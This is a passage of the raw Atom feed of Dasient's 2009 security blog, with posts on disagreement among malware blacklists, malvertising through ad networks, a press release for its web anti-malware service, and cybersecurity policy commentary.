/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/7399650102846726268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/08/dasient-co-founder-neil-daswani-gives.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7399650102846726268'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7399650102846726268'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/08/dasient-co-founder-neil-daswani-gives.html' title='Dasient Co-Founder Neil Daswani Gives Talk At Google'/><author><name>Jeremy Hurwitz</name><uri>http://www.blogger.com/profile/11958290214185064988</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='07825380467852536649'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-5756496205065539288</id><published>2009-07-22T11:01:00.000-07:00</published><updated>2009-07-29T10:47:47.893-07:00</updated><title type='text'>How does a web page harm thee? Let me count the ways....</title><content type='html'>As the web grows and diversifies, so do the number of ways in which web pages can harm users (&lt;a href="http://blog.dasient.com/2009/07/attackers-infect-websites-via-ad.html"&gt;for example&lt;/a&gt;). To help counter this threat, &lt;a href="http://www.google.com/safebrowsing/diagnostic?site=http://google.com"&gt;Google&lt;/a&gt;, &lt;a href="http://safeweb.norton.com/"&gt;Norton&lt;/a&gt;, and &lt;a href="http://siteadvisor.com/"&gt;McAfee&lt;/a&gt; maintain "blacklists" that warn users away from potentially unsafe webpages. But what exactly does it mean to get blacklisted by these services? Do the lists agree on which sites are harmful?&lt;br /&gt;&lt;br /&gt;When analyzing a blacklist, the primary fact to keep in mind is that the term "bad" is not well defined. As such, each list operates under different criteria. Google, for example, focuses on technical threats such as drive-by downloads. McAfee and Norton take a broader view, and will flag a site based on things like "annoyance factors" or "excessive popups." McAfee also signs up for any mailing lists it finds and records the amount of spam generated. 
Google limits itself to a binary response marking a site as potentially harmful (e.g., "This site may harm your computer") or not, while McAfee and Norton label websites as "Safe," "Caution," "Warning," or "Untested."&lt;br /&gt;&lt;br /&gt;Given these divergent criteria, the first thing that is immediately apparent is that it would be much too simplistic to call all blacklisted sites "malicious," while calling all non-blacklisted sites "safe." To see how similar or different these blacklists are in practice, we took a set of relatively popular domains on the Internet and queried all three lists.&lt;br /&gt;&lt;br /&gt;Of the sites that were flagged by at least one of the blacklists:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;57% were marked as potentially harmful or "Warning," with the other 43% marked as "Caution."&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Google flagged 5.2% with a "This site may harm your computer" label.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Norton flagged 16.3% of the sites with a rating of "Warning," and another 14.4% with a rating of "Caution."&lt;/li&gt;&lt;br /&gt;&lt;li&gt;McAfee flagged 38.6% of the sites with a rating of "Warning," and another 32% with a rating of "Caution."&lt;/li&gt;&lt;/ul&gt;&lt;div id="e:ew" style="text-align: left;"&gt; &lt;/div&gt; Per the statistics above, Google's list was by far the smallest, reflecting its focus on technical threats. Norton had far more "untested" sites than McAfee, partially explaining Norton's lower numbers.&lt;br /&gt;&lt;br /&gt;When we compare which sites were blacklisted, however, the results become far more interesting. Of the sites that Google blacklisted:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Norton labeled less than half with "Warning," half with "Safe," and the remaining ones as "Untested." 
None were labeled with "Caution."&lt;/li&gt;&lt;br /&gt;&lt;li&gt;McAfee labeled a quarter with &lt;span style="background-color: rgb(255, 255, 255);"&gt;"Warning,"&lt;/span&gt; a quarter were "Untested," and the remaining half were safe. None were labeled with "Caution."&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;McAfee's users lodged complaints about more than half of the sites.&lt;/li&gt;&lt;/ul&gt;Norton and McAfee's blacklists also didn't agree with each other often. Of the sites flagged between them, only 4% were on both lists. Amazingly, &lt;span style="background-color: rgb(255, 255, 255);"&gt;the overlap between all three lists was less than 1%.&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_65LBP_7hJAg/SnCJiFDupkI/AAAAAAAAAAU/m8PTVyUdMXU/s1600-h/blog+post+pie+chart.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 226px;" src="http://1.bp.blogspot.com/_65LBP_7hJAg/SnCJiFDupkI/AAAAAAAAAAU/m8PTVyUdMXU/s320/blog+post+pie+chart.jpg" alt="" id="BLOGGER_PHOTO_ID_5363938374764635714" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:85%;"&gt;Of the sites flagged "Warning" or "Harmful" by at least one list, 61%&lt;br /&gt;were flagged only by McAfee. Only 1% were flagged by all three lists.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: rgb(255, 255, 255);"&gt;&lt;div&gt; These discrepancies shouldn't be surprising, given the fact that the lists employ different criteria and techniques for evaluating sites. 
But there are also deeper reasons for the lack of overlap: For one thing, the frequency and timing of testing can have a significant impact on the rating a site receives -- if a site is compromised after it's tested by a service, and that service doesn't test it again for another day, week, or even month, that site could end up infecting a significant number of its users while still being marked as "safe" by the service. For another, the diagnostics employed by these services aren't necessarily infallible --  web-based malware is sometimes masked to prevent its detection by some testing services. &lt;/div&gt; &lt;div&gt;&lt;br /&gt;&lt;/div&gt; &lt;div&gt; So what does all this mean for protecting your business? How should you deal with the fact that there are so many blacklists out there, testing your site on several different criteria and with varying levels of effectiveness? At Dasient, we believe the answer is being proactive about monitoring and protecting your site from web-based malware. 
To learn how we can help you do that, click &lt;a href="http://wam.dasient.com/"&gt;http://wam.dasient.com&lt;/a&gt;.&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-5756496205065539288?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/5756496205065539288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/07/how-does-web-page-harm-thee-let-me.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5756496205065539288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/5756496205065539288'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/07/how-does-web-page-harm-thee-let-me.html' title='How does a web page harm thee? 
Let me count the ways....'/><author><name>Jeremy Hurwitz</name><uri>http://www.blogger.com/profile/11958290214185064988</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='07825380467852536649'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_65LBP_7hJAg/SnCJiFDupkI/AAAAAAAAAAU/m8PTVyUdMXU/s72-c/blog+post+pie+chart.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-2854428828595828405</id><published>2009-07-07T10:23:00.000-07:00</published><updated>2009-07-07T10:41:17.154-07:00</updated><title type='text'>Attackers infect websites via ad networks, widgets</title><content type='html'>According to &lt;a href="http://twitter.com/sathyabhat/statuses/2456316675"&gt;reports&lt;/a&gt; &lt;a href="http://twitter.com/nicholasfazzio/statuses/2455004013"&gt;&lt;/a&gt;&lt;a href="http://twitter.com/dpoyser/statuses/2454881025"&gt;on&lt;/a&gt; &lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;a href="http://twitter.com/nicholasfazzio/statuses/2455004013"&gt;Twitter&lt;/a&gt; as well as on &lt;a href="http://blogs.zdnet.com/security/?p=3694"&gt;ZDNet&lt;/a&gt; over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, &lt;a href="http://twitter.com/EW_Benelux/statuses/2472329008"&gt;Eyewonder, suffered a malware attack&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_bRoXADOVx4I/SlOHVdo14uI/AAAAAAAAAEg/OywLnp1I0Og/s1600-h/mashable-harms-computers..JPG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 129px;" src="http://4.bp.blogspot.com/_bRoXADOVx4I/SlOHVdo14uI/AAAAAAAAAEg/OywLnp1I0Og/s400/mashable-harms-computers..JPG" alt="" id="BLOGGER_PHOTO_ID_5355773184676586210" border="0" 
/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Malicious advertisements are increasingly being used by attackers as a vector for distributing malware via legitimate sites. In this case, what happens is that the malicious code that the website ends up serving to users is being sourced in from an advertising partner. The website itself has not been compromised by attackers -- rather, the ad network used by the site has been compromised. Attackers often use malicious ads to achieve scale and avoid detection. It would have been difficult for the attackers to infect a large number of high-profile websites directly; instead, they were able to leverage the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added certain ad networks to its internal blacklist to inform its customers where there is a risk that ads may result in infecting their users.&lt;br /&gt;&lt;br /&gt;In addition to malware coming in through ads, we have also seen cases where malicious code comes into a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see &lt;a href="http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf"&gt;section 4.4 of "The Ghost in the Browser"&lt;/a&gt;). We have spoken to website owners who explained that their sites were infected not through attackers exploiting a vulnerability in the website, but because they included a plug-in or widget that ended up being malicious. 
In some cases, the widget is benign for a period of time (even years), but then drastically changes behavior to become malicious (either because the widget provider was itself malicious or, more likely, because the widget provider's servers were hacked).&lt;br /&gt;&lt;br /&gt;Attackers will continue to find network and web application vulnerabilities in websites that they can exploit to directly plant malicious code. However, it is clear from the Eyewonder incident that the attackers will also seek ways of exploiting the trusted relationships between websites and their third-party advertising or content partners to create the same effect. The nature of the open web encourages websites to mash up best-of-breed content (and ads) from various sources. To reduce risk, it is important for websites to perform due diligence on all third-party content and ad providers, as well as employ automated detection and remediation services.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-2854428828595828405?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/2854428828595828405/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/07/attackers-infect-websites-via-ad.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/2854428828595828405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/2854428828595828405'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/07/attackers-infect-websites-via-ad.html' title='Attackers infect websites via ad networks, 
widgets'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_bRoXADOVx4I/SlOHVdo14uI/AAAAAAAAAEg/OywLnp1I0Og/s72-c/mashable-harms-computers..JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-6531584062185624430</id><published>2009-06-16T06:04:00.000-07:00</published><updated>2009-06-16T14:44:41.045-07:00</updated><title type='text'>Introducing Dasient Web Anti-Malware (WAM)</title><content type='html'>posted by Neil Daswani, Ameet Ranadive, and Shariq Rizvi, &lt;br /&gt;Co-Founders, Dasient&lt;br /&gt;&lt;br /&gt;&lt;p&gt;If you've been following our &lt;a href="http://blog.dasient.com"&gt;blog&lt;/a&gt;, you'll know that we've been talking quite a bit about the latest security threats on the web. One of the threats we've been focusing on specifically is web-based malware. This kind of attack -- in which hackers compromise a legitimate site and turn it into a delivery vehicle for drive-by malware downloads -- has long been regarded as an &lt;a href="http://news.zdnet.co.uk/security/0,1000000189,39429909,00.htm"&gt;emerging threat&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;&lt;p&gt;But one look at the numbers makes it clear that this threat has officially arrived: In the last two years, there's been a &lt;a href="http://www.scribd.com/full/16478532?access_key=key-15a2wxzelgqjm6r0kf3r"&gt;600% increase&lt;/a&gt; in the number of malware-infected webpages, and &lt;a href="http://www.pcworld.com/businesscenter/article/144485/security_filters_often_flag_legit_but_infected_sites.html"&gt;80% of those pages are legitimate&lt;/a&gt;.  
Google first reported the problem of &lt;a href="http://www.google.com/url?sa=t&amp;source=web&amp;ct=res&amp;cd=1&amp;url=http%3A%2F%2Fresearch.google.com%2Farchive%2Fprovos-2008a.pdf&amp;ei=B543SqjyJJL0MoOi7IwN&amp;rct=j&amp;q=google+all+your+iframes+point+to+us&amp;usg=AFQjCNG6wDgy2BVmSSt3f55wyMW04AqV0Q&amp;sig2=hro7WB2JqEoaJudPEpcvhg"&gt;malware-infected pages exploding from April 2007 to January 2008&lt;/a&gt;.  Microsoft estimated in an &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&amp;displaylang=en"&gt;April 2009 report&lt;/a&gt; that the total number of legitimate webpages being compromised per month is more than 1 million. And now that search engines like Google and Yahoo; browsers like IE8, Firefox, and Chrome; and desktop AV providers like Norton and McAfee are blacklisting compromised sites, those sites are seeing double-digit losses in traffic and revenue and taking significant hits to their reputation.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Those are just some of the reasons we're proud to be opening up our &lt;a href="http://www.dasient.com/"&gt;Dasient Web Anti-Malware service&lt;/a&gt; to a broader audience today. Dasient Web Anti-Malware -- or "WAM," as we like to call it -- is the world's first complete anti-malware solution for websites. Dasient WAM monitors, automatically identifies, and quarantines malware on websites, before those sites suffer significant losses in traffic, revenue, and reputation.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;We're making the &lt;a href="http://www.dasient.com/"&gt;monitoring and diagnostic elements&lt;/a&gt; of WAM openly available in public beta today, and making the &lt;a href="http://www.dasient.com/"&gt;quarantining&lt;/a&gt; element available in private beta. WAM is available both to site owners and to web hosting providers interested in offering their customers protection against web-based malware. 
If you want to learn more, jump down to the full text of our news release, which we've included below. If you're ready to get started right away, head &lt;a href="http://www.dasient.com"&gt;here&lt;/a&gt; to sign up for free blacklist monitoring for your site.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;We're excited to be bringing these necessary protections to the web, and are looking forward to your feedback. Stay tuned to this space for more news on Dasient WAM and further insights on the development of new web-based threats.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Here is the press release:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;    Dasient Introduces First Web Anti-Malware Service&lt;br /&gt;&lt;br&gt;    Addresses Growing Need for Protection From New Web-Based Attacks&lt;br /&gt;&lt;br /&gt;&lt;p&gt;PALO ALTO, June 16, 2009 – Dasient today introduced the industry's first service to protect companies against a fast-growing class of web-based attacks that compromise legitimate websites and then use them to spread malware to the sites' visitors. Dasient's new Web Anti-Malware (WAM) service continually monitors websites, diagnoses any infections, and helps businesses address the infections, before the sites suffer significant losses in traffic, revenue, and reputation.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;"In the last two years, we've seen a fundamental shift in the way malware is spread," said Dasient co-founder Dr. Neil Daswani. "Hackers are using highly automated and mutable attacks to turn websites into delivery vehicles for malicious software. This is a web problem at its core, and it requires a solution that can function at web speed and web scale. That's exactly what we had in mind when we designed the Dasient WAM service."&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;b&gt;Sharp Increase in Malware-Infected Webpages&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Each day, thousands of legitimate websites are infected with malicious code, often without their knowledge. 
The speed, scale, and complexity of these attacks makes it extremely difficult for website owners to identify and fix the resulting infections, and in some cases to even know they've occurred.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. When blacklisted, a website's visitors are redirected to a warning that the site they're about to visit might be dangerous. In many cases, being blacklisted causes a sharp drop in traffic to the site, depriving the site owner of advertising or e-commerce revenue, damaging the site's brand, and spurring additional support costs.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;b&gt;Dasient Identifies and Contains Malware That Can Infect Site Visitors&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Today Dasient is announcing the following updates to its patent-pending Web Anti-Malware service, which has been in alpha testing with thousands of websites since early this year:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;&lt;b&gt;Free Blacklist Monitoring&lt;/b&gt;: Regularly monitors blacklists from search engines, browsers, and desktop anti-virus companies and provides customers with instant alerts if they've been flagged by those providers. The WAM Blacklist Monitoring service is now in public beta, and is available for free to direct customers and web hosting providers. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;&lt;b&gt;Premium Monitoring and Diagnosis&lt;/b&gt;: Continuously monitors customer websites for malicious code that can be distributed by web applications, user-generated content, third-party widgets, advertisements, and other vulnerable site elements. When an infection is identified, customers are notified and provided with detailed diagnostic information, including all malicious source code and infected URLs. 
The WAM Premium Monitoring service is now in public beta, and is available on a subscription basis to direct customers and web hosting providers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;li&gt;&lt;b&gt;Quarantining&lt;/b&gt;: Used in conjunction with the Premium Monitoring service, Dasient's quarantining technology automatically contains infections as soon as they're diagnosed, serving the webpages in question but not the malicious code. Quarantining prevents the site from spreading malware broadly to its visitors and keeps it from being flagged by blacklist providers. The WAM Quarantining service is now in private beta, and direct customers and web hosting providers can sign up to join the beta on the Dasient site.&lt;br /&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;The Dasient WAM monitoring and diagnostic services are built on a set of behavioral analysis technologies that continually crawl customer sites and the web, identifying new web-based malware infections. The monitoring and diagnostic tools are provided to customers as a web service, and the quarantining technology is made available as a web server module that can be installed by customers or web hosting providers. &lt;br /&gt;&lt;br /&gt;&lt;p&gt;More information about the Dasient WAM service and pricing can be found at &lt;a href="http://www.dasient.com"&gt;www.dasient.com&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;b&gt;About Dasient&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Dasient is an Internet security company that protects businesses from web-based malware attacks. It is the first to develop a complete Web Anti-Malware service that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue. Dasient was founded by former Google engineers Neil Daswani and Shariq Rizvi and former McKinsey strategy consultant Ameet Ranadive. 
They are backed by a group of seed investors who also invested in VeriSign, Citrix, Twitter, Digg, Tumbleweed, Finjan, and more. More information about Dasient can be found at &lt;a href="http://www.dasient.com"&gt;www.dasient.com&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-6531584062185624430?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/6531584062185624430/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/06/introducing-dasient-web-anti-malware.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6531584062185624430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6531584062185624430'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/06/introducing-dasient-web-anti-malware.html' title='Introducing Dasient Web Anti-Malware (WAM)'/><author><name>Neil Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='02016048081221183427'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-9116561292027587062</id><published>2009-06-02T09:06:00.000-07:00</published><updated>2009-06-02T09:07:29.423-07:00</updated><title type='text'>Obama Gets Serious About Cybersecurity</title><content type='html'>Late last week, President Obama laid out the &lt;a href="http://cspan.org/Watch/Media/2009/05/29/HP/R/19192/Pres+Obama+announces+cyber+security+policy.aspx"&gt;White House cybersecurity policy&lt;/a&gt;, after a 60-day &lt;a 
href="http://www.whitehouse.gov/asset.aspx?AssetId=1732"&gt;"clean slate" review&lt;/a&gt;.  The principles he laid out in his policy (including net neutrality, the necessity to collaborate with the private sector, the importance of protecting privacy, and the need to invest in R &amp; D) have a lot of merit, and I am hopeful that the details that will be fleshed out in the coming months will support them. I have also been glad to see that the President has committed billions of taxpayer dollars behind his principles. My only remaining hope is that these dollars find their way to people and places that can actually help.&lt;br /&gt;&lt;br /&gt;Traditional defense contractors have done an amazing job of building systems that have helped us defend in the physical world. That said, &lt;a href="http://news.google.com/news?pz=1&amp;ned=us&amp;hl=en&amp;q=Contractors+Vie+for+Plum+Work%2C+Hacking+for+U.S."&gt;the New York Times has reported that cybersecurity is a fairly new area to such contractors&lt;/a&gt;. Universities, along with many smaller private sector companies, are where much of the technical expertise lies.  In addition, in my past experience at Google, I learned that there is a big difference between simply having security expertise and incorporating that security expertise into large-scale, automated systems that can defend large parts of the Internet at a time.&lt;br /&gt;&lt;br /&gt;My hope indeed is that taxpayer cybersecurity dollars go toward building large-scale, automated defense systems that can defend large parts of the Internet at a time.  Employing large numbers of human "hacker soldiers" is not an approach that can work and scale up against automated attack systems that include million-machine botnets and &lt;a href="http://www.f-secure.com/en_US/about-us/pressroom/news/2007/fs_news_20071204_1_eng.html"&gt;malware variant generators that produced more malware in 2007 than the world saw in the twenty years prior to that&lt;/a&gt;.  
The nature of web security has changed, and our defense strategies need to change with it -- at the very least, our defenses need to work at web speed and web scale.&lt;br /&gt;&lt;br /&gt;I am thrilled that the Obama administration seems to be taking a more aggressive approach to cybersecurity than any previous administration, and over the next few years I look forward to working together with businesses, universities, and (now more than ever) the government to help the Internet continue to grow as a platform that enables us to safely communicate, collaborate, and conduct commerce.&lt;br /&gt;&lt;br /&gt;Sincerely,&lt;br /&gt;&lt;br /&gt;Neil Daswani, PhD&lt;br /&gt;&lt;a href="http://www.dasient.com"&gt;http://www.dasient.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.neildaswani.com"&gt;http://www.neildaswani.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-9116561292027587062?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/9116561292027587062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/06/obama-gets-serious-about-cybersecurity.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/9116561292027587062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/9116561292027587062'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/06/obama-gets-serious-about-cybersecurity.html' title='Obama Gets Serious About Cybersecurity'/><author><name>Neil Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' 
name='OpenSocialUserId' value='02016048081221183427'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-954577912465667742</id><published>2009-05-27T12:06:00.001-07:00</published><updated>2009-05-31T11:33:45.364-07:00</updated><title type='text'>Web-Based Malware Attacks at an All-Time High</title><content type='html'>Over the past couple of weeks, there has been more web-based malware activity than in any previous similar period this year. The size of Google's malware blacklist, which is used to mark sites with a "This site may harm your computer" annotation in its search results, exceeded 200,000 sites for the first time last week, reaching an all-time high of 229,980 today. This increase was due in part to the rapid propagation of a drive-by-download virus named &lt;a href="http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating"&gt;Gumblar&lt;/a&gt;. Compromising legitimate sites to serve malware to unsuspecting users has long been regarded as an emerging trend, but numbers like these make it clear that this attack vector is already a significant threat -- and as web applications become more and more sophisticated, the attack surface for this vector will only increase in size. 
Existing solutions have so far not been able to keep pace with this fast-moving threat, and new solutions may be required.&lt;br /&gt;&lt;br /&gt;-- Neil&lt;br /&gt;&lt;a href="http://www.neildaswani.com"&gt;http://www.neildaswani.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-954577912465667742?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/954577912465667742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/05/web-based-malware-attacks-at-all-time.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/954577912465667742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/954577912465667742'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/05/web-based-malware-attacks-at-all-time.html' title='Web-Based Malware Attacks at an All-Time High'/><author><name>Neil Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='02016048081221183427'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-284559674838861449</id><published>2009-04-10T10:05:00.000-07:00</published><updated>2009-04-10T10:26:09.929-07:00</updated><title type='text'>Cybersecurity, a matter of national security, broader than combating cyberspies</title><content type='html'>The Wall St. 
Journal &lt;a href="http://online.wsj.com/article/SB123914805204099085.html"&gt;published an interesting article yesterday about cyberspies from Russia and China installing malware on the US electricity grid&lt;/a&gt;. The malware is currently benign. However, the fear among national security officials is that the malware could be activated during a crisis or war and disrupt the US electricity grid.&lt;br /&gt;&lt;br /&gt;Cybersecurity is truly a matter of national security. This article highlights the direct threat of cyberspies who may try to disrupt our national infrastructure. However, equally risky is the threat of cybercriminals who, if unchecked, will disrupt commerce and advertising on the Internet. By undermining consumers' and businesses' confidence in the Internet, cybercriminals will erode the progress that we have achieved over the last 10-15 years with conducting business online. This will ultimately hurt the US (and global) economy, at a time when the economy does not need another reason to be down. 
Thus, in order to maintain national security, the government should address cybercriminal activity (which does not necessarily target government assets) in addition to locking down government infrastructure (like the electricity grid).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-284559674838861449?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/284559674838861449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/04/cybersecurity-matter-of-national.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/284559674838861449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/284559674838861449'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/04/cybersecurity-matter-of-national.html' title='Cybersecurity, a matter of national security, broader than combating cyberspies'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-7838621224368595711</id><published>2009-04-06T08:54:00.000-07:00</published><updated>2009-04-06T09:07:13.335-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DDOS'/><category scheme='http://www.blogger.com/atom/ns#' term='webhost'/><category scheme='http://www.blogger.com/atom/ns#' term='web hosting provider'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>Register.com a 
victim of DDOS attack</title><content type='html'>The &lt;a href="http://voices.washingtonpost.com/securityfix/2009/04/web_sites_disrupted_by_attack.html?wprss=securityfix"&gt;Washington Post's Brian Krebs reports&lt;/a&gt; that web host and domain name registrar Register.com was the "target of a sustained attack this week, disrupting service for thousands of customers." The attack was a distributed denial of service (DDOS) attack, launched by a botnet of hundreds or thousands of compromised PCs, which caused a 3-hour outage for Register.com last week. It appears that Register.com has taken steps to resolve the problem, but in the process, they unfortunately lost some business from their customers. Web hosts and registrars like Register.com are often a target of hackers who seek to achieve economies of scale in their attacks. It is very important that web hosting providers, an important group in the Internet infrastructure ecosystem, maintain high security standards to protect themselves and their customers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-7838621224368595711?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' 